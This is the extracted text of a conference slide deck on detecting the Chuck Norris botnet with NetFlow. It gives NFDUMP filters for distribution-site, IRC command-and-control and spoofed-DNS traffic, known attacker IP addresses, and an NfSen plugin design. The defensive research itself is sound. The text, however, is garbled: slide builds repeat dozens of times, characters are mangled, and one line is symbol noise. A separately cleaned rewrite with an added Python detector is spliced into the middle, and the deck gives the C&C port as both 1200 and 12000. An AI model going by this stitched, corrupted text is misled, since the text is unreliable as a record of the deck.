botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet C&C Center – Phase III

Bot’s IRC traffic with command and control center

[diagram: infected device in the local network → botnet C&C server, TCP/1200, SYN+ACK flags]

NFDUMP detection filter:
(src net local_network) and (dst ip IRC_server [2]) and (dst port 1200) and (proto TCP) and (flags SA and not flag R)

[2] IP address of an attacker’s IRC server (botnet C&C center)
DNS Spoofing Attack Detection – Phase IV

Attacker’s DNS or OpenDNS queries
- Common DNS requests forwarded to OpenDNS servers
- Targeted DNS requests forwarded to attacker’s spoofed DNS

DNS queries outside the local network

Used for phishing attacks
- E.g. Facebook or banking sites

[diagram: infected device in the local network → OpenDNS server / spoofed DNS server, UDP/53]

NFDUMP detection filter:
(src net local_network) and ((dst ip OpenDNS servers [3]) or (dst ip DNS servers [4])) and (proto UDP) and (dst port 53)

[3] IP addresses of the common OpenDNS servers
[4] IP addresses of the attacker’s spoofed DNS servers
ADSL String Detection

Looking for the ADSL string
- ADSL string indicates the Chuck Norris botnet
- Searching in victim’s hostname or victim’s WHOIS record
- Querying DNS server and parsing the received hostname
- Querying WHOIS database and parsing the received info

[screenshot: DNS/WHOIS lookup output in which the string "adsl" appears in the resolved hostname]
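The Phase II–IV NFDUMP filters above and the ADSL string check, re-implemented as one classifier over NetFlow-like records. This is an added example, not code from the authors' NfSen plugin; the server addresses are those the deck lists as detected Chuck Norris servers, while the local network 198.51.100.0/24, the comma-separated record format, the sample flows, the reverse-DNS table and all function names are constructed for this example.

```python
# Added example (not the authors' NfSen plugin code): the NFDUMP filters for
# Phases II-IV and the ADSL string check as a classifier over NetFlow-like
# records.  Server addresses come from the "Detected Chuck Norris Servers"
# slide; local network, record format, flows and rDNS table are constructed.
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

WEB_SERVERS = {"87.98.173.190", "87.98.163.86"}        # botnet distribution sites [1]
IRC_SERVER = "87.98.173.190"                            # botnet C&C center [2]
# The filter slide says dst port 1200, the server list says 12000; match both.
IRC_PORTS = {1200, 12000}
OPENDNS_SERVERS = {"208.67.222.222", "208.67.220.220"}  # common OpenDNS servers [3]
SPOOFED_DNS_SERVERS = {"87.98.163.86"}                  # attacker's spoofed DNS [4]
LOCAL_NETWORK = ip_network("198.51.100.0/24")           # constructed "local_network"


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str   # "TCP" or "UDP"
    dport: int
    flags: str   # cumulative TCP flags seen in the flow, e.g. "SPA"; "" for UDP


def parse_flows(text):
    """Parse constructed 'src,dst,proto,dport,flags' lines (not nfdump's format)."""
    flows = []
    for line in text.strip().splitlines():
        src, dst, proto, dport, flags = (x.strip() for x in line.split(","))
        flows.append(Flow(src, dst, proto.upper(), int(dport), flags.upper()))
    return flows


def from_local(f):
    return ip_address(f.src) in LOCAL_NETWORK


def syn_ack_no_rst(f):
    """nfdump 'flags SA and not flag R': SYN and ACK seen, no RST, so the
    handshake completed rather than the port being refused or merely scanned."""
    return {"S", "A"} <= set(f.flags) and "R" not in f.flags


def phase2_distribution_site(f):
    return (from_local(f) and f.dst in WEB_SERVERS and f.dport == 80
            and f.proto == "TCP" and syn_ack_no_rst(f))


def phase3_cc_center(f):
    return (from_local(f) and f.dst == IRC_SERVER and f.dport in IRC_PORTS
            and f.proto == "TCP" and syn_ack_no_rst(f))


def phase4_dns_spoofing(f):
    """Return 'spoofed_dns', 'opendns' or None.  The slide's filter matches both
    destination sets; they are told apart here because a query to the
    attacker's DNS is a far stronger signal than a query to OpenDNS."""
    if not (from_local(f) and f.proto == "UDP" and f.dport == 53):
        return None
    if f.dst in SPOOFED_DNS_SERVERS:
        return "spoofed_dns"
    if f.dst in OPENDNS_SERVERS:
        return "opendns"
    return None


def has_adsl_string(hostname_or_whois):
    """ADSL string detection: case-insensitive search in hostname or WHOIS text."""
    return "adsl" in (hostname_or_whois or "").lower()


def detect(flows, rdns):
    """Per local host, collect the phases observed and the ADSL check result.
    `rdns` (host -> hostname) stands in for the plugin's DNS/WHOIS lookups."""
    report = defaultdict(lambda: {"phases": set(), "adsl": False})
    for f in flows:
        if phase2_distribution_site(f):
            report[f.src]["phases"].add("II:distribution_site")
        if phase3_cc_center(f):
            report[f.src]["phases"].add("III:cc_center")
        kind = phase4_dns_spoofing(f)
        if kind:
            report[f.src]["phases"].add("IV:" + kind)
    for host, entry in report.items():
        entry["adsl"] = has_adsl_string(rdns.get(host))
    return dict(report)


# Constructed sample: an infected ADSL device going through all three phases,
# an ordinary OpenDNS user, a refused (RST) connection and a non-local source.
SAMPLE_FLOWS = """
198.51.100.7,87.98.173.190,TCP,80,SPA
198.51.100.7,87.98.173.190,TCP,1200,SPA
198.51.100.7,208.67.222.222,UDP,53,
198.51.100.7,87.98.163.86,UDP,53,
198.51.100.9,208.67.220.220,UDP,53,
198.51.100.9,87.98.173.190,TCP,80,SR
203.0.113.5,87.98.173.190,TCP,1200,SPA
"""
SAMPLE_RDNS = {"198.51.100.7": "adsl-dyn-100-7.isp.example",
               "198.51.100.9": "printer-9.office.example"}

if __name__ == "__main__":
    for host, entry in sorted(detect(parse_flows(SAMPLE_FLOWS), SAMPLE_RDNS).items()):
        print(host, sorted(entry["phases"]), "ADSL" if entry["adsl"] else "")
```

A host that only shows "IV:opendns" is an ordinary OpenDNS user until another phase or the ADSL string corroborates it; the spoofed-DNS and C&C matches are the ones worth alerting on.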
Detected Chuck Norris Servers

Known IP addresses
- Web server addresses: 87.98.173.190, 87.98.163.86
- IRC server addresses: 87.98.173.190, 87.98.163.86
- IRC server port: 12000
- OpenDNS server addresses: 208.67.222.222, 208.67.220.220
- Spoofed DNS server: 87.98.163.86

This data is used in the detection methods by default.
IP address updates are published at the project page.
Part IV
NfSen Botnet Detection Plugin
Botnet Detection Plugin

Plugin features
- Detects Chuck Norris-like botnet behavior
- Based on NetFlow and other network data sources
- Processes data regularly and provides real-time output

Plugin architecture
- Compliant with the NfSen plugin architecture recommendations
- PHP frontend with a Perl backend and a PostgreSQL DB
- Web, e-mail and syslog detection output and reporting
Plugin Architecture

[diagram: BACKEND – cndet.pm talks to nfsend through the comm interface and calls cndetdb.pm, which reads NetFlow data, DNS and the WHOIS db and stores results in PostgreSQL; FRONTEND – cndet.php]
Plugin Methods Architecture

[diagram: cndetdb.pm with PostgreSQL, NetFlow data, DNS and the WHOIS db as its data sources, feeding the detection methods:]
- Telnet scan detection
- Botnet distribution sites detection
- Botnet C&C centers detection
- DNS spoofing attack detection
- ADSL string detection
Web Interface – Infected Host Detected
Part V
Conclusion
Detection Plugin and Other Botnets

Botnet lifecycle similar for the majority of botnets
- scanning for possible bots
- infection of a vulnerable device
- bot initialization/update
- botnet operation

Botnet detection plugin customization
- modular plugin engine
- easy modification for detection of other botnets
- we need to customize the detection methods
- plugin distributed under the BSD license
Conclusion

Network devices are not protected
- Routers, access points, printers, cameras, TVs, ...
- No AV software, missing patches and firmware updates
- But they should be protected

Experience
- NetFlow can monitor all such devices in a network
- Discovery of the new Chuck Norris botnet using NetFlow
- Developed a specialized NfSen plugin for Chuck Norris botnet detection

Future
- Chuck Norris is down, but others are coming (e.g. Stuxnet)
- We are open to research collaboration
- Detection plugin is available at our project site
Thank You For Your Attention

Vojtěch Krmíček, Tomáš Plesník
{vojtec|plesnik}@ics.muni.cz

Project CYBER: http://www.muni.cz/ics/cyber

Detecting Botnets with NetFlow

This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801.
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
